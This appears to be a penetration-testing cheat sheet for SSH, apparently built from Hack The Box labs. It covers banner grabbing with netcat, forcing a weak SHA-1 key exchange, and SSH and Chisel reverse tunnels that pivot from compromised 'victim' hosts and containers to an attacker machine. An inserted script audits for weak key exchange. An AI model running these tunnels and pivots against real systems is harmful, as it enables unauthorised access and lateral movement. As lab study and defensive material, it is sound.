22 - SSH
Banner Grabbing
$ nc -vn <IP> 22
Generate SSH Key
$ ssh-keygen -t rsa -b 4096 -f matt-id_rsa
No Matching Key Exchange
$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
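The offer in that error is also an audit finding about the server: all three algorithms hash with SHA-1, and diffie-hellman-group1-sha1 additionally uses a 1024-bit group. An added example (not from the original page) that parses such an error line and flags those algorithms; the function names are assumptions of this example, and the sample input is the line quoted above.

```shell
#!/bin/sh
# Added example: classify the key-exchange algorithms a server offered,
# read from the OpenSSH client's "Unable to negotiate" error line.

# Constructed sample input: the error line quoted on this page.
SAMPLE_ERR='Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1'

# kex_offer LINE -> prints the offered algorithms, one per line.
# Returns 1 if LINE carries no "Their offer: " list.
kex_offer() {
  case "$1" in
    *"Their offer: "*) printf '%s\n' "${1##*Their offer: }" | tr ',' '\n' ;;
    *) return 1 ;;
  esac
}

# classify_kex NAME -> prints "NAME<TAB>verdict".
classify_kex() {
  case "$1" in
    diffie-hellman-group1-sha1) printf '%s\tweak: SHA-1 and 1024-bit group\n' "$1" ;;
    *-sha1)                     printf '%s\tweak: SHA-1\n' "$1" ;;
    *)                          printf '%s\tnot flagged by this check\n' "$1" ;;
  esac
}

# audit_offer LINE -> prints one verdict per offered algorithm.
# Returns 0 if at least one offered algorithm is not SHA-1 based,
# 1 if every offered algorithm is SHA-1 based, 2 if LINE has no offer.
audit_offer() {
  _offer=$(kex_offer "$1") || return 2
  _rc=1
  for _alg in $_offer; do          # algorithm names contain no whitespace
    classify_kex "$_alg"
    case "$_alg" in *-sha1) ;; *) _rc=0 ;; esac
  done
  return "$_rc"
}

audit_offer "$SAMPLE_ERR" || echo "finding: server offers only SHA-1 key exchange"
```

On a server you administer, the fix is to restrict KexAlgorithms in sshd_config to non-SHA-1 methods rather than loosening every client.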
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb
SSH Tunneling
// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10
// Local tunnel from attacker, enum victim port 8002
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa
## Using Chisel to enumerate local webservices on remote host
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse
// Chisel Client (victim host)
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080
## Using Chisel to set up a tunnel from a compromised docker container to proxy
## traffic toward docker host (172.17.0.1:3000).
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse
// Chisel Client (victim docker)
./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000
Brute Force id_rsa
Vault SSH OTP
Vault is used to provide one-time passwords (OTP) for SSH logins. To request an OTP you need to know the role, for example ssh/creds/otp_key_role; the role is found in secrets.sh.
Interesting Files